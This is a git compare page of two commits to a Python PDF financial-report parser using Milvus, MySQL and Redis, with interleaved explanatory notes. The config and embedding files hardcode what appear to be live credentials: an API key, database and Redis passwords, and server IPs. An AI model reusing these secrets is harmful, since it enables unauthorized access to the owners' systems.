Compare commits
2 Commits
main ... pdf-dsw-20

Author | SHA1 | Date
---|---|---
 | edbcc245a6 |
 | 24764099c4 |
@@ -0,0 +1,58 @@
import socket
import subprocess
import time
from datetime import datetime


def get_time():
    return datetime.now().strftime('%Y-%m-%d %H:%M:%S')


def check_port(host, port):
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        result = sock.connect_ex((host, port))
        sock.close()
        return result
    except Exception as e:
        print(f"[{get_time()}] Port check error: {str(e)}")
        return False


def restart_service():
    try:
        subprocess.run("bash /root/docker/milvus/standalone_embed.sh restart", shell=True)
        # Preferred form:
        # subprocess.run(["bash", "standalone_embed.sh", "restart"])
        print(f"[{get_time()}] Milvus service restarted")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] Service restart failed: {str(e)}")
        return False


def restart_zzbservice():
    try:
        # NOTE: this cd runs in its own shell, so it does not affect the next call
        subprocess.run("cd /root/pdf_parser/zzb_data_prod", shell=True)
        subprocess.run("nohup python3 app.py > app.log 2>&1 &", shell=True)
        print("zzb service restarted")
        return True
    except subprocess.CalledProcessError as e:
        print(f"[{get_time()}] zzb service restart failed: {str(e)}")


if __name__ == '__main__':
    print(f"[{get_time()}] Starting Milvus monitor")
    port_ok = check_port("127.0.0.1", 19530)
    if port_ok not in [0, True]:
        print("Milvus service appears unhealthy, attempting restart...")
        restart_service()

    print(f"[{get_time()}] Starting zzb monitor")
    port_ok = check_port("127.0.0.1", 8000)

    if port_ok not in [0, True]:
        print("zzb service appears unhealthy, attempting restart...")
        restart_zzbservice()
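connect_ex returns 0 on success and an errno code on failure, while the except branch above returns False, which is why callers have to test port_ok not in [0, True]. A boolean helper (a sketch with an assumed name, not part of this commit) avoids that inverted check:

import socket

def is_port_open(host: str, port: int, timeout: float = 5.0) -> bool:
    # connect_ex returns 0 on success and an errno code otherwise,
    # so normalize the inverted truthiness to a bool here
    try:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
            sock.settimeout(timeout)
            return sock.connect_ex((host, port)) == 0
    except OSError:
        return False

# usage: if not is_port_open("127.0.0.1", 19530): restart_service()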
Binary file not shown.
@@ -0,0 +1,99 @@
# Requires transformers>=4.51.0

import torch
import torch.nn.functional as F

from torch import Tensor
from modelscope import AutoTokenizer, AutoModel
import datetime
import dashscope
from http import HTTPStatus

# 'logger' is used below but was never imported in the original file;
# assuming the repo's log_config module here.
from log_config import logger


dashscope.api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'

def embed_with_str(input):
    retry = 0
    max_retry = 5
    t = 0.2
    while retry < max_retry:
        # time.sleep(t)
        # Alibaba's endpoint rate-limits requests
        resp = dashscope.TextEmbedding.call(
            model=dashscope.TextEmbedding.Models.text_embedding_v2,
            input=input)
        if resp.status_code == HTTPStatus.OK:
            return resp
        elif resp.status_code == 429:
            logger.info(f'Rate limited; waiting {t}s before retrying')
            retry += 1
            t += 0.1
        else:
            logger.error(f'Request failed, status code: {resp.status_code}')
            return None
    logger.error('Retry limit exceeded')
    return None


def last_token_pool(last_hidden_states: Tensor,
                    attention_mask: Tensor) -> Tensor:
    left_padding = (attention_mask[:, -1].sum() == attention_mask.shape[0])
    if left_padding:
        return last_hidden_states[:, -1]
    else:
        sequence_lengths = attention_mask.sum(dim=1) - 1
        batch_size = last_hidden_states.shape[0]
        return last_hidden_states[torch.arange(batch_size, device=last_hidden_states.device), sequence_lengths]


def get_detailed_instruct(task_description: str, query: str) -> str:
    return f'Instruct: {task_description}\nQuery:{query}'

# Each query must come with a one-sentence instruction that describes the task
task = 'Given a web search query, retrieve relevant passages that answer the query'

queries = [
    get_detailed_instruct(task, 'What is the capital of China?'),
    get_detailed_instruct(task, 'Explain gravity')
]
# No need to add instruction for retrieval documents
documents = [
    "The capital of China is Beijing.",
    "Gravity is a force that attracts two bodies towards each other. It gives weight to physical objects and is responsible for the movement of planets around the sun."
]
input_texts = queries + documents

tokenizer = AutoTokenizer.from_pretrained('Qwen/Qwen3-Embedding-0.6B', padding_side='left')
model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B')

# We recommend enabling flash_attention_2 for better acceleration and memory saving.
# model = AutoModel.from_pretrained('Qwen/Qwen3-Embedding-0.6B', attn_implementation="flash_attention_2", torch_dtype=torch.float16).cuda()
print(datetime.datetime.now())
max_length = 8192

# Tokenize the input texts
batch_dict = tokenizer(
    input_texts,
    padding=True,
    truncation=True,
    max_length=max_length,
    return_tensors="pt",
)
batch_dict.to(model.device)
outputs = model(**batch_dict)


embeddings = last_token_pool(outputs.last_hidden_state, batch_dict['attention_mask'])

# Normalize embeddings
embeddings = F.normalize(embeddings, p=2, dim=1)
print("=========embeddings=========")
print(datetime.datetime.now())

scores = (embeddings[:2] @ embeddings[2:].T)
print(len(embeddings.tolist()[0]))
# [[0.7645568251609802, 0.14142508804798126], [0.13549736142158508, 0.5999549627304077]]


vector_obj = embed_with_str(input_texts)
vector = vector_obj.output["embeddings"][0]["embedding"]
print(len(vector))
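The query-document similarity matrix is computed but never shown; the bracketed matrix in the comment is what printing it should produce. A one-line follow-up (a sketch using the objects defined above):

# embeddings are L2-normalized, so this dot product is cosine similarity
print(scores.tolist())  # expected to be close to the commented matrix above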
@@ -1,9 +1,11 @@
 from pymilvus import connections, FieldSchema, CollectionSchema, DataType, Collection,MilvusClient
 from config import MILVUS_CLIENT
 import time
 from datetime import datetime, timedelta

 def create_partition_by_hour(current_hour):
     # Connect to the Milvus server
-    connections.connect("default",uri=MILVUS_CLIENT)
+    connections.connect(uri=MILVUS_CLIENT)
     # Get the collection
     collection_name = "pdf_measure_v4"
     collection = Collection(collection_name)

@@ -32,37 +34,6 @@ def create_partition_by_hour(current_hour):



-    # data = []
-    # measure_data = {}
-    # vector = [0.61865162262130161] * 1536
-    # measure_data['vector'] = vector
-    # measure_data['table_num'] = int(2)
-    # measure_data['table_index'] = int(2)
-    # measure_data['measure_name'] = "234234"
-    # measure_data['measure_value'] = "23432"
-    # measure_data['measure_unit'] = "123423"
-    # measure_data['file_id'] = "100000"
-    #
-    # data.append(measure_data)
-    # res = client.insert(
-    #     collection_name=collection_name,
-    #     data=data,
-    #     partition_name=partition_name
-    # )

-    # filter_str = 'file_id == "'+"2122"+'"'
-    # res = client.search(
-    #     collection_name=collection_name, # Replace with the actual name of your collection
-    #     # Replace with your query vector
-    #     data=data,
-    #     limit=3, # Max. number of search results to return
-    #     search_params={"metric_type": "COSINE", "params": {}}, # Search parameters
-    #     output_fields=["measure_name", "measure_value", "table_num", "table_index", "measure_unit"],
-    #     filter=filter_str,
-    #     partition_name=partition_name
-    # )
-    # print(f"============================={res}")




@@ -98,4 +69,4 @@ def create_partition_by_hour(current_hour):
     #     "params": {"nlist": 128}
     # }
     # collection.create_index(field_name="vector", index_params=index_params)
     # collection.load()
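The hourly-partition helper above presumably reduces to a has_partition/create_partition check; a minimal sketch of that idea (assumed logic — the function body between these hunks is not shown in the diff):

from pymilvus import Collection, connections

def ensure_hour_partition(collection_name: str, current_hour: str, uri: str) -> None:
    # partition names follow the "partition_<hour>" convention used in app.py
    connections.connect(uri=uri)
    collection = Collection(collection_name)
    partition_name = f"partition_{current_hour}"
    if not collection.has_partition(partition_name):
        collection.create_partition(partition_name)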
@@ -14,10 +14,10 @@ import db_service
 import threading
 from Mil_unit import create_partition_by_hour
 from datetime import datetime, timedelta
-
+from log_config import logger

 app = FastAPI()
 cpu_count = os.cpu_count()
 cpu_count = 4
 job_queue = queue.Queue()

 # Define the request body model
@@ -30,7 +30,7 @@ def run_job():
     if_run = True

     if job_queue.empty():
-        print(f"job_queue is empty: {file_path}")
+        logger.info(f"job_queue is empty: {file_path}")
         if_run = False

     if if_run:
@@ -43,29 +43,19 @@ def run_job():
         try:
             # Download the PDF
             start_time = time.time()
-            print(f"Starting file parse task: {file_path}")
+            logger.info(f"Starting file parse task: {file_path}")
             if file_path.startswith('http'):
                 file_path = utils.save_pdf_from_url(file_path, config.FILE_PATH)
             try:
                 file_info = pdf_title.create_text_outline(file_path,file_id)
             except Exception as e:
                 response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 7})
-                print(f'Task-status notify URL {file_id}: {response.url}')
-                print(f'Task-status notify response {file_id}: {response.text}')
-                print(f"{file_id} failed: {e}")
+                logger.info(f'Task-status notify URL {file_id}: {response.url}')
+                logger.info(f'Task-status notify response {file_id}: {response.text}')
+                logger.info(f"{file_id} failed: {e}")
                 continue_execution = False
             if continue_execution:
-                print(cpu_count)
                 parent_table_pages = file_info['parent_table_pages']
-                print('parent_table_pages value is')
-                print(parent_table_pages)

-                # page_nums = [
-                #     '1-3',
-                #     '4-6',
-                # ]
-                print(cpu_count)
-                print('test')
                 page_num = file_info['page_count']
                 if page_num < cpu_count:
                     p_count = page_num
@@ -73,7 +63,6 @@ def run_job():
                     p_count = cpu_count

                 for i in range(p_count):
-                # for i in range(2):
                     page_list.append({
                         'type': 'table',
                         'page_num': file_info['split_parts']['table_split_parts'][i],
@@ -88,8 +77,8 @@ def run_job():

                 # Notify that parsing has started
                 response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 5})
-                print(f'PDF parse-start notify URL {file_id}: {response.url}')
-                print(f'PDF parse-start notify response {file_id}: {response.text}')
+                logger.info(f'PDF parse-start notify URL {file_id}: {response.url}')
+                logger.info(f'PDF parse-start notify response {file_id}: {response.text}')
                 parser_start_time = time.time()
                 processes = []
                 time_dispatch_job = time.time()
@@ -98,30 +87,27 @@ def run_job():
                     p = Process(target=main.dispatch_job, args=(job_info,))
                     processes.append(p)
                     p.start()
-                #time_dispatch_job_end = time.time()
-                #process_time = time_dispatch_job_end - time_dispatch_job
-                #db_service.process_time(file_id,'1',process_time)

-                print('Waiting for all subtasks, task ID:', file_id)
+                logger.info(f'Waiting for all subtasks, task ID: {file_id}')
                 for p in processes:
                     p.join()
-                print('PDF parse task finished, task ID:', file_id)
+                logger.info(f'PDF parse task finished, task ID: {file_id}')
                 time_dispatch_job_end = time.time()
                 process_time = time_dispatch_job_end - time_dispatch_job
                 db_service.process_time(file_id,'1',process_time,time_dispatch_job,time_dispatch_job_end)
                 parser_end_time = time.time()
-                print(f"Parse task {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                logger.info(f"Parse task {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
                 # Decide here whether to continue
                 if db_service.file_type_check(file_id):
-                    print("Text-verification table generation already finished")
+                    logger.info("Text-verification table generation already finished")
                 else:
                     # Notify that measure extraction is starting
                     response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 6})
-                    print(f'Measure-extraction notify URL {file_id}: {response.url}')
-                    print(f'Measure-extraction notify response {file_id}: {response.text}')
+                    logger.info(f'Measure-extraction notify URL {file_id}: {response.url}')
+                    logger.info(f'Measure-extraction notify response {file_id}: {response.text}')

                     parser_start_time = time.time()
-                    print('Starting table measure extraction, task ID:', file_id)
+                    logger.info(f'Starting table measure extraction, task ID: {file_id}')
                     time_start = time.time()
@@ -131,6 +117,7 @@ def run_job():
                     partition_name = f"partition_{current_hour}"
                     # Create a new partition if needed
                     create_partition_by_hour(current_hour)
+                    time.sleep(10)
                     # Check whether this is a Q3 report

                     if db_service.file_type_check_v2(file_id) == 3:
@@ -138,17 +125,17 @@ def run_job():
                         time_start_end = time.time()
                         process_time = time_start_end - time_start
                         db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('Table measure extraction finished, task ID:', file_id)
+                        logger.info(f'Table measure extraction finished, task ID: {file_id}')
                         parser_end_time = time.time()
-                        print(f"Table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                        logger.info(f"Table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")

-                        print('Starting measure normalization, task ID (test edit):', file_id)
+                        logger.info(f'Starting measure normalization, task ID (test edit): {file_id}')
                         time_update = time.time()
                         main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)

-                        print('Normalization finished, task ID:', file_id)
+                        logger.info(f'Normalization finished, task ID: {file_id}')
                         end_time = time.time()
-                        print(f"Task {file_id} finished in {(end_time - start_time):.2f}s")
+                        logger.info(f"Task {file_id} finished in {(end_time - start_time):.2f}s")
                         time_update_end = time.time()
                         process_time = time_update_end - time_update
                         db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
@@ -158,25 +145,25 @@ def run_job():
                         time_start_end = time.time()
                         process_time = time_start_end - time_start
                         db_service.process_time(file_id,'2',process_time,time_start,time_start_end)
-                        print('Table measure extraction finished, task ID:', file_id)
+                        logger.info(f'Table measure extraction finished, task ID: {file_id}')
                         parser_end_time = time.time()
-                        print(f"Table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")
+                        logger.info(f"Table measure extraction {file_id} finished in {(parser_end_time - parser_start_time):.2f}s")

-                        print('Starting measure normalization, task ID (test edit):', file_id)
+                        logger.info(f'Starting measure normalization, task ID (test edit): {file_id}')
                         time_update = time.time()
                         main.update_measure_data(file_id,file_path,parent_table_pages,partition_name)

-                        print('Normalization finished, task ID:', file_id)
+                        logger.info(f'Normalization finished, task ID: {file_id}')
                         end_time = time.time()
-                        print(f"Task {file_id} finished in {(end_time - start_time):.2f}s")
+                        logger.info(f"Task {file_id} finished in {(end_time - start_time):.2f}s")
                         time_update_end = time.time()
                         process_time = time_update_end - time_update
                         db_service.process_time(file_id,'3',process_time,time_update,time_update_end)
                     # Notify task completion
                     response_time = time.time()
                     response = requests.get(config.NOTIFY_ADDR, params={'fileId': file_id,'status': 1})
-                    print(f'Task-status notify URL {file_id}: {response.url}')
-                    print(f'Task-status notify response {file_id}: {response.text}')
+                    logger.info(f'Task-status notify URL {file_id}: {response.url}')
+                    logger.info(f'Task-status notify response {file_id}: {response.text}')
                     response_time_end = time.time()
                     process_time = response_time_end - response_time
                     db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
@@ -191,17 +178,17 @@ def run_job():
                 response_time_end = time.time()
                 process_time = response_time_end - response_time
                 db_service.process_time(file_id,'4',process_time,response_time,response_time_end)
-                print(f'Task-status notify URL {file_id}: {response.url}')
-                print(f'Task-status notify response {file_id}: {response.text}')
-                print(f"Response status code: {response.status_code}")
-                print(f"{file_id} failed: {e}")
+                logger.info(f'Task-status notify URL {file_id}: {response.url}')
+                logger.info(f'Task-status notify response {file_id}: {response.text}')
+                logger.info(f"Response status code: {response.status_code}")
+                logger.info(f"{file_id} failed: {e}")
             finally:
-                print(f"Task {file_id} finished, status: {job_status}")
+                logger.info(f"Task {file_id} finished, status: {job_status}")

                 #pdf_company_0824.name_code_fix(file_id,file_path)
                 #print('Company name and code fill-in complete')
     else:
-        print("A task is already running, waiting.....")
+        logger.info("A task is already running, waiting.....")

 def parse_pdf_route(fileItem: FileItem):
@@ -210,7 +197,7 @@ def parse_pdf_route(fileItem: FileItem):
         'file_path' : fileItem.file_path,
         'file_id' : fileItem.file_id
     })
-    print(f"Added {fileItem.file_id} to the queue.")
+    logger.info(f"Added {fileItem.file_id} to the queue.")

    threading.Thread(target=run_job, args=()).start()

@@ -221,16 +208,37 @@ app.post("/parser/start",
          summary="解析Pdf文件",
          )(parse_pdf_route)

+def get_local_ip():
+    try:
+        # Create a UDP socket
+        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+        # "Connect" to an external address (Google's public DNS server)
+        s.connect(("8.8.8.8", 80))
+        # Read the local end's IP address
+        local_ip = s.getsockname()[0]
+    except Exception as e:
+        logger.info(f"Failed to get the internal IP: {e}")
+        local_ip = "127.0.0.1"  # fall back to loopback on failure
+    finally:
+        s.close()  # close the socket
+    return local_ip

 # Run the FastAPI app
 if __name__ == "__main__":
     # Server startup
-    # import uvicorn
-    # uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    import uvicorn
+    uvicorn.run(app, host="0.0.0.0", port=config.PORT)
+    try:
+        # Get the internal IP
+        # NOTE: uvicorn.run() blocks, so this only executes after shutdown,
+        # and the URL below has no scheme/host, which requests will reject
+        ip = get_local_ip()
+        response = requests.get(f"/api/tenant/report/restart?address={ip}:{config.PORT}")
+    except KeyboardInterrupt:
+        logger.info("Shutdown server")

     # Local debug job
-    job_queue.put({
-        'file_path' : '3.pdf',
-        'file_id' : '2122'
-    })
-
-    run_job()
+    # job_queue.put({
+    #     'file_path' : '1.pdf',
+    #     'file_id' : '2122'
+    # })
+    #
+    # run_job()
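For reference, the /parser/start route registered above takes a FileItem with file_path and file_id. A hypothetical client call would look like this (host is an assumption; the port comes from config.PORT = 8000):

import requests

resp = requests.post(
    "http://127.0.0.1:8000/parser/start",
    json={"file_path": "http://example.com/report.pdf", "file_id": "2122"},
)
print(resp.status_code, resp.text)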
Binary file not shown.
@@ -1,28 +1,28 @@
-MILVUS_CLIENT='http://124.70.129.232:19530'
-#MILVUS_CLIENT='http://60.204.228.154:19530'
-MYSQL_HOST = '121.37.185.246'
+MILVUS_CLIENT='http://127.0.0.1:19530'
+MILVUS_HOST = '127.0.0.1'
+MILVUS_PORT = 19530
+MYSQL_HOST = '10.127.2.207'
 MYSQL_PORT = 3306
-MYSQL_USER = 'financial'
-MYSQL_PASSWORD = 'financial_8000'
-MYSQL_DB = 'financial_report'
-NOTIFY_ADDR = 'http://127.0.0.1:8100/api/tenant/report/notify'
-NOTIFY_ADDR_DIS = 'http://127.0.0.1:8100/api/tenant/info/notify'
-REDIS_HOST = '123.60.153.169'
+MYSQL_USER = 'financial_prod'
+MYSQL_PASSWORD = 'mmTFncqmDal5HLRGY0BV'
+MYSQL_DB = 'financial_report_test'
+NOTIFY_ADDR = 'http://10.127.2.206:8101/api/tenant/report/notify'
+FILE_PATH = '/root/pdf_parser/pdf/'
+REDIS_HOST = '10.127.2.206'
 REDIS_PORT = 6379
 REDIS_PASSWORD = 'Xgf_redis'
-FILE_PATH = '/root/pdf_parser/pdf/'
 PORT = 8000
-MEASURE_COUNT = 8
+MEASURE_COUNT = 4


-MYSQL_HOST_APP = '121.37.185.246'
+MYSQL_HOST_APP = '10.127.2.207'
 MYSQL_PORT_APP = 3306
-MYSQL_USER_APP = 'financial'
-MYSQL_PASSWORD_APP = 'financial_8000'
-MYSQL_DB_APP = 'financial_report'
+MYSQL_USER_APP = 'financial_prod'
+MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
+MYSQL_DB_APP = 'financial_report_test'


 api_key = 'sk-f8413fcfa63a40e49dbb8ac1d0239f6d'
 # 'sk-3cc9e1601f654c149d2a4e99ef8a8946'


 #MYSQL_HOST_APP = '192.168.0.201'
 #MYSQL_PORT_APP = 3306
 #MYSQL_USER_APP = 'root'
 #MYSQL_PASSWORD_APP = 'mmTFncqmDal5HLRGY0BV'
 #MYSQL_DB_APP = 'financial_report_prod'
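The MySQL and Redis credentials above are committed in plaintext. A common alternative (a sketch, not part of this change) is to read them from the environment and keep only non-secret defaults in the file:

import os

MYSQL_HOST = os.getenv("MYSQL_HOST", "127.0.0.1")
MYSQL_USER = os.getenv("MYSQL_USER", "financial_prod")
MYSQL_PASSWORD = os.getenv("MYSQL_PASSWORD", "")  # no secret default
REDIS_PASSWORD = os.getenv("REDIS_PASSWORD", "")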
@@ -10,6 +10,9 @@ from pymilvus import MilvusClient
 import mysql.connector
 import threading
 import redis
+from log_config import logger


 measure_name_keywords = ["营业","季度","利润","归属于","扣非","经营","现金","活动","损益","收益","资产","费用","销售","管理","财务","研发","货币资金","应收账款","存货","固定资产","在建工程","商誉","短期借款","应付账款","合同负债","长期借款","营业成本"]
 # Parse the measures extracted by the LLM and insert them into the database
@@ -133,9 +136,9 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
                 WHERE file_id = %s AND page_num = %s AND table_index = %s
             '''
             cursor.execute(update_query, (unit, file_id, page_num, table_index))
-            #print(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
+            logger.info(f'Updated existing record with file_id={file_id}, page_num={page_num}, table_index={table_index}.')
         else:
-            print(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
+            logger.info(f'No change needed. Existing unit={existing_unit} is the same as new unit={unit}.')
     else:
         # Insert a new record
         insert_query = '''

@@ -145,7 +148,7 @@ def insert_table_unit_info_v1(table_info, conn, cursor):
         '''
         data_to_insert = (file_id, page_num, table_index, unit)
         cursor.execute(insert_query, data_to_insert)
-        #print(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')
+        logger.info(f'Inserted new record with file_id={file_id}, page_num={page_num}, table_index={table_index}, unit={unit}.')

     conn.commit()

@@ -190,6 +193,16 @@ def update_ori_measure(conn,cursor,file_id):
     and t1.file_id = '{file_id}'
     and t2.year = '{year}'
     '''.format(file_id=file_id, year=report_year)
+    select_query_first = '''
+    SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
+    FROM ori_measure_list t1
+    left join
+    measure_config_first_quarter t2
+    on t1.ori_measure_id = t2.ori_measure_id
+    where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
+    and t1.file_id = '{file_id}'
+    and t2.year = '{year}'
+    '''.format(file_id=file_id, year=report_year)
     select_query_half_year = '''
     SELECT t2.measure_id,t2.measure_name,t1.ori_measure_id
     FROM ori_measure_list t1
@@ -205,59 +218,73 @@ def update_ori_measure(conn,cursor,file_id):
     FROM ori_measure_list t1
     left join
     measure_config_third_quarter t2
-    on t1.ori_measure_id = t2.ori_measure_id
+    on t1.ori_measure_id = t2.ori_measure_id
     where t2.measure_id is not null and (t1.measure_id is null or t1.measure_id ='')
     and t1.file_id = '{file_id}'
     and t2.year = '{year}'
     '''.format(file_id=file_id, year=report_year)

-    if report_type == 1:
+    if report_type == 1:  # half-year report
         start_time = time.time()
         cursor.execute(select_query_half_year)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Update-data query took {(end_time - start_time):.2f}s")
-        print('update_ori_measure took the half-year branch')
-    elif report_type == 3:
+        logger.info(f"Update-data query took {(end_time - start_time):.2f}s")
+        logger.info('update_ori_measure took the half-year branch')
+    elif report_type == 2:  # Q1 report
+        start_time = time.time()
+        cursor.execute(select_query_first)
+        records = cursor.fetchall()
+        end_time = time.time()
+        logger.info(f"Update-data query took {(end_time - start_time):.2f}s")
+        logger.info('update_ori_measure took the Q1 branch')
+    elif report_type == 3:  # Q3 report
         start_time = time.time()
         cursor.execute(select_query_thrid)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Update-data query took {(end_time - start_time):.2f}s")
-        print('update_ori_measure took the Q3 branch')
-    else:
+        logger.info(f"Update-data query took {(end_time - start_time):.2f}s")
+        logger.info('update_ori_measure took the Q3 branch')
+    else:  # annual report
         start_time = time.time()
         cursor.execute(select_query)
         records = cursor.fetchall()
         end_time = time.time()
-        print(f"Update-data query took {(end_time - start_time):.2f}s")
-        print('update_ori_measure took the annual branch')
+        logger.info(f"Update-data query took {(end_time - start_time):.2f}s")
+        logger.info('update_ori_measure took the annual branch')
     start_time = time.time()
     for record in records:
         data_to_update = (record[0], record[1], record[2], file_id)
         cursor.execute(update_query, data_to_update)
     conn.commit()
     end_time = time.time()
-    print(f"Update-data write took {(end_time - start_time):.2f}s")
+    logger.info(f"Update-data write took {(end_time - start_time):.2f}s")
     # Update measure_list with this file's display measures
     start_time = time.time()
     create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

-    if report_type == 0:
+    if report_type == 0:  # annual report
         insert_query = '''
         INSERT INTO measure_list
         (measure_id, measure_name, create_time, update_time, file_id)
         select distinct measure_id,measure_name, %s,%s,%s from measure_config
         where year = '{year}'
         '''.format(year=report_year)
-    elif report_type == 3:
+    elif report_type == 2:  # Q1 report
+        insert_query = '''
+        INSERT INTO measure_list
+        (measure_id, measure_name, create_time, update_time, file_id)
+        select distinct measure_id,measure_name, %s,%s,%s from measure_config_first_quarter
+        where year = '{year}'
+        '''.format(year=report_year)
+    elif report_type == 3:  # Q3 report
         insert_query = '''
         INSERT INTO measure_list
         (measure_id, measure_name, create_time, update_time, file_id)
         select distinct measure_id,measure_name, %s,%s,%s from measure_config_third_quarter
         where year = '{year}'
         '''.format(year=report_year)
-    else:
+    else:  # half-year report
         insert_query = '''
         INSERT INTO measure_list
         (measure_id, measure_name, create_time, update_time, file_id)
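The branches above select one config table per report type; inferred from the comments in this hunk, the mapping is 0 = annual, 1 = half-year, 2 = Q1, 3 = Q3. As a summary sketch:

# report_type -> measure-config table (inferred from the branches above)
CONFIG_TABLE_BY_REPORT_TYPE = {
    0: "measure_config",                # annual report
    1: "measure_config_half_year",      # half-year report
    2: "measure_config_first_quarter",  # Q1 report
    3: "measure_config_third_quarter",  # Q3 report
}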
@@ -269,13 +296,13 @@ def update_ori_measure(conn,cursor,file_id):
     cursor.execute(insert_query, data_to_update)
     conn.commit()
     end_time = time.time()
-    print(f"Update-data insert took {(end_time - start_time):.2f}s")
+    logger.info(f"Update-data insert took {(end_time - start_time):.2f}s")

 def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,records,record_range,black_array,partition_name,):
     create_time = datetime.now().strftime("%Y-%m-%d %H:%M:%S")

-    print('Run task %s (%s)...' % (record_range, os.getpid()))
-    print(f"Inserting {len(records)} records")
+    logger.info(f'Run task {record_range} ({os.getpid()})...')
+    logger.info(f"Inserting {len(records)} records")


     conn = mysql.connector.connect(
@@ -332,11 +359,12 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re

     cursor_app.execute(select_parent_query)
     parent_records = cursor_app.fetchall()
     #print(f"before: {parent_table_pages}")


     for parent_record in parent_records:
         parent_id = parent_record[0]
         parent_table_pages.append(int(parent_id))
     #print(f"after: {parent_table_pages}")


     # Collect the page numbers and table indexes whose above-table text hits blacklist keywords
     table_index_array = []

@@ -348,15 +376,19 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
     measure_index_array = []
     cursor_app.execute(select_measure_index_query, (file_id,))
     measure_index_records = cursor_app.fetchall()
-    print("Executing SQL:", select_measure_index_query)
-    print("With file_id:", file_id)
+    logger.info(f"Executing SQL:{select_measure_index_query}")
+    logger.info(f"With file_id:{file_id}")
     for measure_index_record in measure_index_records:
         measure_index_array.append(measure_index_record[0])
-    print(f'Blacklist values: {parent_table_pages} and {table_index_array}, plus new {measure_index_array}')
+    logger.info(f'Blacklist values: {parent_table_pages} and {table_index_array}, plus new {measure_index_array}')
     #print(f'Blacklist values: {parent_table_pages} and {table_index_array}')
     record_start = record_range.split('-')[0]
     record_end = record_range.split('-')[1]

+    if str(report_type) == "2":
+        table_index_array = []
+        measure_index_array = []

     client = MilvusClient(
         uri=MILVUS_CLIENT,
     )
@@ -370,6 +402,8 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
             ori_measure_id = record[3]
             measure_id = record[4]
             measure_vector = redis_service.read_from_redis(redis_client,ori_measure_id)


             measure_list = ast.literal_eval(measure_vector)
             data = [measure_list]
             filter_str = 'file_id == "'+file_id+'"'

@@ -383,10 +417,10 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
                 filter=filter_str,
                 partition_name=partition_name
             )



             # Convert the output to a formatted JSON string
-            # for i in range(len(res[0])):
+            for i in range(len(res[0])):

                 vector_distance = float(res[0][i]["distance"])
|
|||
if utils.check_pdf_measure_black_list(pdf_measure):
|
||||
continue
|
||||
if f"{table_num}_{table_index}" in measure_index_array and utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
#if utils.check_pdf_measure_black_list_v3(file_id,table_num,table_index,pdf_measure,conn_app,cursor_app):
|
||||
print(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
|
||||
logger.info(f'经过第三层规则去除了{table_num}页的{pdf_measure}指标')
|
||||
continue
|
||||
|
||||
|
||||
|
||||
|
||||
if vector_distance > distance and table_num not in parent_table_pages:
|
||||
#检测规则开始
|
||||
#判断抽取指标和财报指标周期是否相同
|
||||
ori_period = utils.get_period_type(ori_measure_name, report_year)
|
||||
pdf_period = utils.get_period_type(pdf_measure, report_year)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第1处{ori_period}和{pdf_period}')
|
||||
logger.info(f'第1处{ori_period}和{pdf_period}')
|
||||
if(ori_period != pdf_period):
|
||||
continue
|
||||
|
||||
|
@ -429,7 +464,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
start_ori_period = utils.get_start_period_type(ori_measure_name)
|
||||
start_pdf_period = utils.get_start_period_type(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第2处{start_ori_period}和{start_pdf_period}')
|
||||
logger.info(f'第2处{start_ori_period}和{start_pdf_period}')
|
||||
if(start_ori_period != start_pdf_period):
|
||||
continue
|
||||
|
||||
|
@ -437,7 +472,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_season_type = utils.get_season_flag(ori_measure_name)
|
||||
pdf_season_type = utils.get_season_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第3处{ori_season_type}和{pdf_season_type}')
|
||||
logger.info(f'第3处{ori_season_type}和{pdf_season_type}')
|
||||
if(ori_season_type != pdf_season_type):
|
||||
continue
|
||||
|
||||
|
@ -445,7 +480,7 @@ def insert_table_from_vector_mul_process(parent_table_pages,file_id,file_name,re
|
|||
ori_kf_type = utils.get_kf_flag(ori_measure_name)
|
||||
pdf_kf_type = utils.get_kf_flag(pdf_measure)
|
||||
if pdf_measure == '2023年6月30日货币资金合计':
|
||||
print(f'第4处{ori_kf_type}和{pdf_kf_type}')
|
||||
